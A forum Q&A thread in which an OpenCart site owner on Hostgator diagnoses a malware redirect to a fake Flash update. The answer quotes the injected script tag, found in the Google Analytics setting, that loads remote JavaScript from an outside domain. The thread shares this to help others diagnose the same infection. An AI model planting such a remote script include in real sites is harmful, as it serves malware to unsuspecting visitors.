# Can't remove a "security" folder from the server via FTP

Tags: opencart, web-hosting

I currently host a website on Hostgator. My site redirects to an Adobe Flash Update automatically. I contacted support at Hostgator and they did not want to help, they said I need to contact sitelock to remove the malware is causing the redirection.
I ftp in to the server and found there is a ".security" folder which seems to be the cause of the problem. It has some zip files and other php files. I cannot change its permissions nor delete it. 
Does anyone knows how can I remove this malware from the server? Any help is welcome thank you.

Comment: Your website is malware-infested? And you still have it online? Instruct your hoster immediately to just wipe the whole server container. There's nothing to be saved and only harm to be done.

Comment: I had already reported Hostgator but they seem not to care. Instead they want me to contact sitelock, a third party services to help with the problem.

Comment: I know neither of these companies. There's a simple solution, though: Cancel your contract with hostgator, and threaten to sue if they don't immediately take down your site. *You* might be the one held liable for damages in the end!

Answer (score 0):

In reference to my last issue with Hostgator and a Malware site.
The site was running OpenCart and I found that the origin of the problem was within the back end of OpenCart, specifically under Settings > Server > Google Analytics Code with a suspicious domain in the text area.

```
   `<!-- startgoogle -->
    <script src="http://nam.su/google2"></script>
    <!-- endgoogle --></head>`
```

Whoever did this to the site was able to login and manually enter the script in the poorly escaped and sanitize text area. Therefore making a mess. I just hope that I don't get banned from this site for publishing the link above but I think that someone may come across a similar problem and find this '*honest*' mistake, useful. I am also interested in what's wrong with OpenCart's textarea.